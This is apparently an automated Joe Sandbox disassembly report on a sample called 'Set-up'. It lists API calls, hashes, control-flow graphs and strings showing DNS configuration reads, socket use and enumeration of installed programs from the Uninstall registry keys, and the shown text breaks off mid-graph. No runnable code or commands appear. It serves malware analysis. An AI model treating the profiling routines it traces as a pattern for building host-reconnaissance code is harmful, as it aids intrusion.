                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assertgetsockname
                          • String ID: ares__sortaddrinfo.c$cur != NULL
                          • API String ID: 1186336949-2430778319
                          • Opcode ID: 69910924f9999ad6f0e7b962978224d7c98169896df93a7ee7dbf487290b5f48
                          • Instruction ID: a5555534e3c1aa6304a46d1031329c5908d456917e1b67e41fcdef2620efcb27
                          • Opcode Fuzzy Hash: 69910924f9999ad6f0e7b962978224d7c98169896df93a7ee7dbf487290b5f48
                          • Instruction Fuzzy Hash: 02C16E716043559FD718DF26C881A6BB7E1BF88304F04886DF949AB3A2DB34ED45CB81
                          APIs
                          • Sleep.KERNEL32 ref: 000211B7
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00021238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0002124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00021261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000212EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00021323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0002132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00021344
                          • GetStartupInfoA.KERNEL32 ref: 00021433
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 3873122205-0
                          • Opcode ID: f7a1cbd7e5ed746ac211440bc0ba462d525e38ebe67a90d19cb0527f47dfa10e
                          • Instruction ID: bc6c4671c6889b71f4600b32d05ee4c81b0d1c5f895d6c063c80fdebb44d8f10
                          • Opcode Fuzzy Hash: f7a1cbd7e5ed746ac211440bc0ba462d525e38ebe67a90d19cb0527f47dfa10e
                          • Instruction Fuzzy Hash: 535178B1A043158FDB51EF68E9807AABBF2FB59304F10492DE9489B312DB70A945CF91
                          APIs
                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 000EA90C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: recvfrom
                          • String ID:
                          • API String ID: 846543921-0
                          • Opcode ID: a7f3c86ea7e0dd52a7dfbf48662851e8c746647ea667632e1cdbb2c362c873b0
                          • Instruction ID: ac8e65f61d8baf7899b1888df9c954bbb085b9403a15931dd757354a16efe637
                          • Opcode Fuzzy Hash: a7f3c86ea7e0dd52a7dfbf48662851e8c746647ea667632e1cdbb2c362c873b0
                          • Instruction Fuzzy Hash: FCF01D75208348AFD2209F42DC48D6BBBEDEFCD754F05456DF958232119671AE14CA72
                          APIs
                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA499
                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA4FB
                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 000DA531
                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 000DAA19
                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DAA4C
                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 000DAA97
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 000DAAE9
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 000DAB30
                          • RegCloseKey.KERNELBASE(?), ref: 000DAB6A
                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 000DAB82
                          • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DABAD
                          • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DABF0
                          • RegCloseKey.ADVAPI32(?), ref: 000DAC2A
                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 000DAC46
                          • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 000DAC71
                          • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 000DACB4
                          • RegCloseKey.ADVAPI32(?), ref: 000DACEE
                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 000DAD0A
                          • RegEnumKeyExA.KERNELBASE ref: 000DAD8D
                          • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 000DADB0
                          • RegCloseKey.KERNELBASE(?), ref: 000DADD9
                          • RegEnumKeyExA.KERNELBASE ref: 000DAE08
                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 000DAE2A
                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 000DAE54
                          • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 000DAEA3
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000DAF18
                          • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 000DAF2C
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 000DAF63
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 000DAFB2
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 000DB027
                          • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 000DB03B
                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 000DB072
                          • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 000DB0C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
                          • API String ID: 1856363200-4239849775
                          • Opcode ID: 8521ab0b5417ca44bf4c19cb79dc9b4e93a5465ebe21e3416237f61eaac19129
                          • Instruction ID: 20bc31ccb8f302d7ef155d4f1a6bb2e5a9c5ce694d54d62010be3534af7e7c5c
                          • Opcode Fuzzy Hash: 8521ab0b5417ca44bf4c19cb79dc9b4e93a5465ebe21e3416237f61eaac19129
                          • Instruction Fuzzy Hash: 7F82A071604341AFE3209F25DC85B6BBBE9EF86740F144829F945DB3A1EB70E944CB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 602 e9740-e975b 603 e975d-e9768 call e78a0 602->603 604 e9780-e9782 602->604 612 e976e-e9770 603->612 613 e99bb-e99c0 603->613 606 e9788-e97a0 getenv call e78a0 604->606 607 e9914-e994e memset RegOpenKeyExA 604->607 606->613 617 e97a6-e97c5 _stat64 606->617 609 e995a-e99ab RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen call e78a0 607->609 610 e9950-e9955 607->610 619 e99b0-e99b5 609->619 615 e9a0c-e9a15 610->615 612->617 618 e9772-e977e 612->618 613->615 620 e9827-e9833 617->620 621 e97c7-e97e0 617->621 618->606 619->613 619->617 622 e985f-e9872 call e5ca0 620->622 623 e9835-e985c call de2b0 * 2 620->623 625 e97f6-e9809 _stricmp 621->625 626 e97e2-e97f3 _time64 621->626 633 e9878-e987d call e77b0 622->633 634 e99f0 622->634 623->622 625->620 628 e980b-e9810 625->628 626->625 628->620 630 e9812-e9822 628->630 630->615 639 e9882-e9889 633->639 637 e99f5-e99fb call e5d00 634->637 646 e99fe-e9a09 637->646 639->637 642 e988f-e989b call d4fe0 639->642 642->634 649 e98a1-e98c3 _time64 call e78a0 642->649 646->615 653 e98c9-e98db call de2d0 649->653 654 e99c2-e99ed call de2b0 * 2 649->654 653->654 658 e98e1-e98f0 call de2d0 653->658 654->634 658->654 664 e98f6-e9905 call e63f0 658->664 669 e990b-e990f 664->669 670 e9f66-e9f7f call e5d00 664->670 671 e9a3f-e9a5a call e6740 call e63f0 669->671 670->646 671->670 678 e9a60-e9a6e call e6d60 671->678 681 e9a1f-e9a39 call e6840 call e63f0 678->681 682 e9a70-e9a94 call e6200 call e67e0 call e6320 678->682 681->670 681->671 693 e9a16-e9a19 682->693 694 e9a96-e9ac6 call dd120 682->694 693->681 695 e9fc1 693->695 699 e9ac8-e9adb call dd120 694->699 700 e9ae1-e9af7 call dd190 694->700 698 e9fc5-e9ffd call e5d00 call de2b0 * 2 695->698 698->646 699->681 699->700 700->681 707 e9afd-e9b09 call d4fe0 700->707 707->695 713 e9b0f-e9b29 call de730 707->713 719 e9b2f-e9b3a call e78a0 713->719 720 e9f84-e9f88 713->720 719->720 726 e9b40-e9b54 call de760 719->726 721 e9f95-e9f99 720->721 723 e9f9b-e9f9e 721->723 724 e9fa0-e9fb6 call debf0 * 2 721->724 723->695 723->724 735 e9fb7-e9fbe 724->735 732 e9f8a-e9f92 726->732 733 e9b5a-e9b6e call de730 726->733 732->721 740 e9b8c-e9b97 call e63f0 733->740 741 e9b70-ea004 733->741 735->695 748 e9b9d-e9bbf call e6740 call e63f0 740->748 749 e9c9a-e9cab call dea00 740->749 744 ea015-ea01d 741->744 746 ea01f-ea022 744->746 747 ea024-ea045 call debf0 * 2 744->747 746->698 746->747 747->698 748->749 765 e9bc5-e9bda call e6d60 748->765 757 e9f31-e9f35 749->757 758 e9cb1-e9ccd call dea00 call de960 749->758 762 e9f37-e9f3a 757->762 763 e9f40-e9f61 call debf0 * 2 757->763 777 e9ccf 758->777 778 e9cfd-e9d0e call de960 758->778 762->681 762->763 763->681 765->749 776 e9be0-e9bf4 call e6200 call e67e0 765->776 776->749 796 e9bfa-e9c0b call e6320 776->796 781 e9cd1-e9cec call de9f0 call de4a0 777->781 786 e9d53-e9d55 778->786 787 e9d10 778->787 801 e9cee-e9cfb call de9d0 781->801 802 e9d47-e9d51 781->802 790 e9e69-e9e8e call dea40 call de440 786->790 791 e9d12-e9d2d call de9f0 call de4a0 787->791 814 e9e94-e9eaa call de3c0 790->814 815 e9e90-e9e92 790->815 818 e9d2f-e9d3c call de9d0 791->818 819 e9d5a-e9d6f call de960 791->819 812 e9b75-e9b86 call dea00 796->812 813 e9c11-e9c1c call e7b70 796->813 801->778 801->781 804 e9dca-e9ddb call de960 802->804 823 e9e2e-e9e36 804->823 824 e9ddd-e9ddf 804->824 812->740 836 e9f2d 812->836 813->740 829 e9c22-e9c33 call de960 813->829 842 ea04a-ea04c 814->842 843 e9eb0-e9eb1 814->843 825 e9eb3-e9ec4 call de9c0 815->825 818->791 847 e9d3e-e9d42 818->847 839 e9dc2 819->839 840 e9d71-e9d73 819->840 831 e9e3d-e9e5b call debf0 * 2 823->831 832 e9e38-e9e3b 823->832 834 e9e06-e9e21 call de9f0 call de4a0 824->834 825->681 854 e9eca-e9ed0 825->854 857 e9c66-e9c75 call e78a0 829->857 858 e9c35 829->858 844 e9e5e-e9e67 831->844 832->831 832->844 869 e9e23-e9e2c call deac0 834->869 870 e9de1-e9dee call dec80 834->870 836->757 839->804 852 e9d9a-e9db5 call de9f0 call de4a0 840->852 848 ea04e-ea051 842->848 849 ea057-ea070 call debf0 * 2 842->849 843->825 844->790 844->825 847->790 848->695 848->849 849->735 885 e9db7-e9dc0 call deac0 852->885 886 e9d75-e9d82 call dec80 852->886 861 e9ee5-e9ef2 call de9f0 854->861 881 e9c7b-e9c8f call de7c0 857->881 882 ea011 857->882 865 e9c37-e9c51 call de9f0 _stricmp 858->865 861->681 877 e9ef8-e9f0e call de440 861->877 865->740 889 e9c57-e9c64 call de9d0 865->889 894 e9df1-e9e04 call de960 869->894 870->894 901 e9ed2-e9edf call de9e0 877->901 902 e9f10-e9f26 call de3c0 877->902 881->740 898 e9c95-ea00e 881->898 882->744 906 e9d85-e9d98 call de960 885->906 886->906 889->857 889->865 894->823 894->834 898->882 901->681 901->861 902->901 915 e9f28 902->915 906->839 906->852 915->695
                          APIs
                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 000E978D
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 000E97BA
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000E97E4
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000E98A5
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 000E9920
                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 000E9946
                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 000E9974
                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 000E9981
                          • RegCloseKey.ADVAPI32(?), ref: 000E998B
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000E9992
                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000E97FE
                            • Part of subcall function 000E78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,000EE16D,?), ref: 000E78AF
                            • Part of subcall function 000E78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 000E78D9
                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 000E9C46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                          • API String ID: 3843116398-4129964100
                          • Opcode ID: 4185722d73c2d9d3d8d9c4f5f5e38bff4176e719403ce063369ff4486d47725b
                          • Instruction ID: 6fa7516ff800e3b0acd79a0bf7f784ffbde97a40d5f14e52bc383b4c57547b02
                          • Opcode Fuzzy Hash: 4185722d73c2d9d3d8d9c4f5f5e38bff4176e719403ce063369ff4486d47725b
                          • Instruction Fuzzy Hash: 7E32D6B1904381AFE751AB26EC42A5B77E5AF54314F084435F909AA363FB31ED14C7A3

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: CloseEnumOpen
                          • String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
                          • API String ID: 1332880857-3120786300
                          • Opcode ID: c683dc6de3b7cf8c44c25092785a44ce5bc289acc43cdf4c3ec5b3b6fa061f45
                          • Instruction ID: 270a1e08dcbecbb8409927d81f54d9d08887ada9f850551ff2306d66667b5b95
                          • Opcode Fuzzy Hash: c683dc6de3b7cf8c44c25092785a44ce5bc289acc43cdf4c3ec5b3b6fa061f45
                          • Instruction Fuzzy Hash: A07191B49043199FDB50EF69D5847AEBBF0BF84308F10885DE998A7311D7749A88CF92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1117 1fe5d0-1fe602 strlen MultiByteToWideChar 1118 1fe608 1117->1118 1119 1fe6b0-1fe6bb GetLastError 1117->1119 1122 1fe60f-1fe643 call 3a9f40 MultiByteToWideChar 1118->1122 1120 1fe6bd-1fe6d4 MultiByteToWideChar 1119->1120 1121 1fe6e2-1fe6f2 GetLastError 1119->1121 1120->1121 1123 1fe6d6-1fe6dd 1120->1123 1124 1fe6f4-1fe6ff fopen 1121->1124 1125 1fe703-1fe70a 1121->1125 1122->1125 1128 1fe649-1fe66d strlen MultiByteToWideChar 1122->1128 1123->1122 1124->1125 1129 1fe673-1fe683 _wfopen 1128->1129 1130 1fe701 1128->1130 1129->1125 1131 1fe685-1fe68e _errno 1129->1131 1130->1125 1132 1fe6a0-1fe6ae fopen 1131->1132 1133 1fe690-1fe69e _errno 1131->1133 1132->1125 1133->1125 1133->1132
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE5E2
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 001FE5FA
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 001FE637
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0018A31E), ref: 001FE64D
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0018A31E,00000001,?,00000008,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000), ref: 001FE665
                          • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE678
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE685
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE690
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0018A31E,?,?,?,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E), ref: 001FE6A6
                          • GetLastError.KERNEL32(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE6B0
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 001FE6CC
                          • GetLastError.KERNEL32(?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE6E2
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0018A31E,?,00000000,001A47C4,?,00000000,00000000,00000000,?,00000000,?,0018A31E,?,005FBED4), ref: 001FE6FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                          • String ID:
                          • API String ID: 2867842857-0
                          • Opcode ID: 753119d39295e8ad79f66689e0ef9829975113462c2a3549fa00cfc57fee0268
                          • Instruction ID: ba9b6045f849365563b793e71048316a36c7cdd34b09f15f7f424a6e37a61102
                          • Opcode Fuzzy Hash: 753119d39295e8ad79f66689e0ef9829975113462c2a3549fa00cfc57fee0268
                          • Instruction Fuzzy Hash: 3031A075640208BFEB216B71DC49F7B3BAAEB55721F148524FB16C95E0EF309910CBA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1134 58b50-58b69 1135 58be6 1134->1135 1136 58b6b-58b74 1134->1136 1137 58be9 1135->1137 1138 58b76-58b8d 1136->1138 1139 58beb-58bf2 1136->1139 1137->1139 1140 58bf3-58bfe call 5a550 1138->1140 1141 58b8f-58ba7 call 36e40 1138->1141 1148 58de4-58def 1140->1148 1149 58c04-58c08 1140->1149 1146 58bad-58baf 1141->1146 1147 58cd9-58d16 SleepEx getsockopt 1141->1147 1152 58bb5-58bb9 1146->1152 1153 58ca6-58cb0 1146->1153 1154 58d22 1147->1154 1155 58d18-58d20 WSAGetLastError 1147->1155 1156 58df5-58e19 call 5a150 WSASetLastError 1148->1156 1157 58e8c-58e95 1148->1157 1150 58dbd-58dc3 1149->1150 1151 58c0e-58c1d 1149->1151 1150->1137 1159 58c35-58c48 WSAGetLastError call 5a150 1151->1159 1160 58c1f-58c2f connect 1151->1160 1152->1139 1161 58bbb-58bc2 1152->1161 1153->1147 1158 58cb2-58cb8 1153->1158 1162 58d26-58d39 1154->1162 1155->1162 1182 58e88 1156->1182 1183 58e1b-58e26 1156->1183 1163 58e97-58e9c 1157->1163 1164 58f00-58f06 1157->1164 1166 58ddc-58dde 1158->1166 1167 58cbe-58cd4 call 5b180 1158->1167 1176 58c4d-58c4f 1159->1176 1160->1159 1161->1139 1169 58bc4-58bcc 1161->1169 1170 